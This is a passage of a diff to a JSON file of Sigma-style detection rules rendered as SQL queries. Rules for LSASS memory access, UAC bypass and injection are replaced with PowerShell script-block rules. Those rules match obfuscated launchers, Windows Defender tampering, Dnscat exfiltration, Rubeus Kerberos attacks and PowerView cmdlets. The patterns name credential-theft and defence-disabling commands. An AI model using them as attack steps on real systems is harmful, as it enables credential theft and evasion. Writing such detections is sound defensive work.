"Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE 
'%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using 
a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND 
CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' 
ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 
'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + 
"description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." 
+ "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE 
'%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE 
'%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' 